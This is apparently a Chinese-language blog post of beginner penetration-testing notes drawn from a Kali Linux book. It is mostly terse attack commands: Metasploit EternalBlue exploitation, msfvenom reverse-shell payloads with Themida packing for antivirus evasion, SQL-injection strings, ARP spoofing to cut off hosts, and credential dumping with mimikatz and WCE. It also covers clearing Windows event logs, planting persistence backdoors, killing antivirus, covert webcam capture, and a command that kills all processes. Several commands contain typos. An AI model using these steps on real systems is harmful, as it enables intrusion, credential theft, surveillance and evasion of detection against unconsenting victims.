如何入门渗透
入门的话看这一本就够了,有计算机基础看的更舒服
《Kali Linux渗透测试技术详解》
链接:https://pan.baidu.com/s/1s7YAn6A5q7CQONUMVVZoZQ?pwd=8888
提取码:8888
以下内容就是总结自此书,所以直接看书就行,不用往下翻了
靶场https://www.vulnhub.com/ 注意靶机适配的虚拟机软件
靶场详解 推荐观看红队笔记
也许你在找别的
序、一些入门了解尝试
linux kali安装(我用Hyper-V安的但是非常后悔,推荐Vmware)
apt命令 本命令具有超级牛力,moo~
有关服务
systemctl * enable/disable/start/stop/restart/status 启动服务 关闭服务 重启服务 状态查看 service * 同上 chkconfig * 设置开机启动 关闭开机启动
Proxychains代理设置 通过代理执行命令
vim /etc/proxychains4.conf <加需要代理的ip地址和开放端口>#更改文件以修改代理服务
常用 http(s)8080 socks 1080
命令行中使用 在软件前加 proxychains4 如 proxychains4 git clone ……
测试ip crul cip.cc
测试代理ip proxychains4 crul cip.cc
Tor网络代理 通过多结点隐藏行为
一、信息嗅探
DNS枚举
dnsenum --enum 网址 -w whois --threads[num]
多进程 -r
递归查询 -d
请求间隙 -o
输出位置 fierce
子域查找 -dns
网址
SNMP枚举
snmpwalk -c public <ip> -v 2c
snmpcheck -t <ip>
192.168.0.104常用路由器管理员登录地址
域名查询 Dmitry
dmitry -wnpb <ip>
nslookup 反向域名解析
转换域名为子网掩码
netmask -s <ip>
路由跟踪 Scapy
发送、嗅探、剖析和伪造网络数据包
主动收集信息
具有攻击性 留下痕迹
Nmap查询在线,端口,嗅探服务器
查看tcp端口-sP
查看是否在线Nping
(套具)获取详细信息
查找指定端口范围-p ?-??? <ip>
输出文件-oG 路径
指纹识别-A
详细输出-v
Zenmap GUI化工具 扫描大型网络和主机
APR欺骗
Netdiscover ARP侦查工具 攻击扫描局域网内主机
arpspoof -i eth0 -t <ip> -r <默认网关> #断网指令 条件:网卡正确 处于同一网段
arp -a
ip转mac
Wireshark截取数据包
非主动信息收集
好处是没有痕迹,不易被发现
Maltego 图形化信息收集 被动收集信息 通过网络遍历目录等方式收集 不留痕迹 可结合shodan使用
SHODAN 搜索引擎(服务器):https://www.shodanhq.com
社工库
引擎(一般用):https://searx.org/
二、漏洞扫描
CVE
https://www.exploit-db.com/
主机漏洞扫描
Nessus
优点:功能全面,可视化界面现代化
缺点:功能收费,限制次数
配置完成后127.0.0.1:8834打开网页
OpenVAS
脱离自Nessus,优点就是免费
Web漏洞扫描
nikto wepscan burpsuite yakit
三、漏洞利用
Metasploitable操作系统 用于漏洞测试
metasploit漏洞检测工具 GUI -> Armitage
msfconsle初始化控制台
search
查找漏洞 ms17_010
永恒之蓝0号漏洞 use 0
利用此0号漏洞
show options
查看必选项 set RHOSTS <ip>
配置目标主机
run
运行
msfvenom木马
use exploit/multi/handler #选择模块
-p linux/x64/meterpreter/reverse_tcp #根据系统选择合适的payload
set lhost <ip> #配置监听主机
-x
捆绑木马 -o
输出文件 -f
文件格式
msfcli
命令行控制
meterperter
触发漏洞后返回控制通道
Themida加壳,提高免杀能力和隐蔽性
SQL注入 命令执行漏洞
' union select user,password form users # 获取数据库
1' union select null,database(); #获取数据库名#select要求行数一致 null在补行数
1' union select null,table_name from information_schema.tables where table_schema='数据库名';#获取特定数据库所有表名
1' union select form '表名' ;#获取表内容
--dbs
列出所有可用数据库-D
加数据库名表示针对 --tables
列出数据库表-T
加表名针对 --columns
列出表项 --dump
读取数据
F12打开控制台,选择网络
刷新页面获取cookie
WPScan 攻击基于WrodPress搭建的网页(blog)
四、进阶渗透
权限提升
提权的方法很多,包括但不限于假冒令牌、爆破密码、提权漏洞、php提权、python提权等等。
攻击载荷(payload)
反弹式shell 目标主机->攻击主机传递shell
Bind shell 在目标系统上绑定shell至监听窗口 攻击者连接打开的端口来取得shell交互
中间人攻击(MITM)
Ettercap 执行命令 ettercap -G 打开图形界面
停止嗅探后 还需停止中间人攻击
Subterfuge自动化中间人攻击工具 127.0.0.1:80访问网页
密码攻击
在线破解
Hydra
能否破解只与字典是否强大相关 图形工具xHydra
kali自带常用字典: wordlists
自定义创建字典工具Crunch
crunch [min length][max length] [character set (包含元素)][options(比如输出文件-o)]
msfconsole
执行 search email collector
收集组织邮件信息构建字典 mimikatz
破解恢复纯文本密码
离线破解
哈希值识别 hash-identifier
破解哈希值密码 findmyhash <哈希值类型> -h hash
Metaploit psexec绕过哈希值建立会话
John the ripper暴力密码破解器
rtgen 生成彩虹表(哈希值集合 随密码复杂程度增大 主流100G)
无线网络渗透 Kismet嗅探工具 fluxion wifi钓鱼工具
五、清除痕迹
具体步骤
激活Meterpreter对话
执行命令
msf exploit(handler)> sessions -i 1
执行命令
meterpreter>irb
指定日志
执行命令
log=client.sys.eventlog.open`('文件名')
常有文件名:'system' 'security' 'application' 'directory service' 'dns server' 'file replication service'
清除日志
执行命令
log.clear
六、创建后门
具体步骤
激活Meterpreter对话
如上
run persistence -h #查看后门帮助文件
run persistence -U -A -i 10 - 8090(端口) -r 目标ip #创建后门
七、后渗透
#以下为meterpreter中命令
刚获得shell时 shell是很脆弱的 实战中需要先进一步操作
getpid #获取pid
migrate <num> #将目标转移到某进程
kill <num> #杀死某进程 一般是杀死之前残留的进程
run post/windows/manage/killav #关闭杀毒软件
getuid #查看用户名
run post/windows/gather/checkvm #查看目标是否为虚拟机
idletime #查看运行时间
route #查看完整网络配置
background #将meterpreter终端隐藏指后台
route add #添加路由 route print查看路由 添加路由后可以用此目标机对其他网络进行攻击 也就是成为了肉鸡
run post/windows/manage/enable_rdp #启动3389远程桌面
run post/windows/manage/autoroute #查看目标机本地子网情况
run post/windows/gather/enum_logged_on_users #列举多少用户登录此主机
run post/windows/gather/enum_applications #列举应用程序
run windows/gather/credentials/windows_autologin #抓取自动登陆的用户名和密码
#如果抓取失败 可以用Espia插件 load espia加载此插件 screengrab或者screenshot抓取屏幕截图
webcam_list #查看目标机是否有摄像头
webcam_snap #打开摄像头 拍一张照片
webcam_stream #开启直播模式 //直播地址
Shell #进入命令行
pwd getlwd ls cd search download upload #文件系统命令
提权
whoami /groups #查看权限 类似操作还有 <sudo -l> <getuid>
getsystem #提权尝试
systeminfo #查看补丁
假冒令牌
我们先输入use incognito命令,然后输入list_tokens-u列出可用的token
接下来在incognito中调用impersonate_token命令假冒Administrator用户进行攻击 具体命令 impresionate_token <主机名>\用户名
运行成功后在Meterpreter Shell下运行shell命令并输入whoami 可查看到当前已经成为此用户
PwDump是一款Win32环境下的系统授权信息导出工具,目前没有任何一款工具可以导出如此全面的信息、支持这么多的OS版本,而且相当稳定
-dhl:导出本地哈希值。
-dhdc:导出内存中的域控哈希值。
-dhd:导出域控哈希值,必须指定NTDS文件。
-db:导出Bitlocker信息,必须指定NTDS文件。
-nt:导出NTDS文件。
-hist:导出历史信息,可选项。
-t:可选导出类型,默认导出John类型。
-o:导出文件到本地。
WCE windows内网渗透工具
upload 路径/wce.exe C:\上传wce到靶机C盘 在目标shell下输入wce -w 提取管理员密码
-l 读取数据格式 -f 强制安全读取 -g计算密码
Mimikatz 轻量级调试器 用于抓取密码 模拟令牌 获取票据、证书、私钥 绕过远程终端等 已集成在meterpreter中
条件:1 已成为管理员 2 windows2000和xp不能用 3 32位 64位也可以 但是会有一些麻烦
持续后门生成:
Cymothoa
Persistence
#meterpreter提供
Web后门 :
菜刀、蚁剑
meterpreter payload:PHP Meterpreter
杀死当前所有进程
for /f "tokens=1" %i in ('tasklist ^| findstr /I /R ".*"') do taskkill /F /PID %i (win)
pkill -u $USER(linux)
声明:部分摘自网络,仅供学习交流。另,学艺不精,欢迎斧正
此方悬停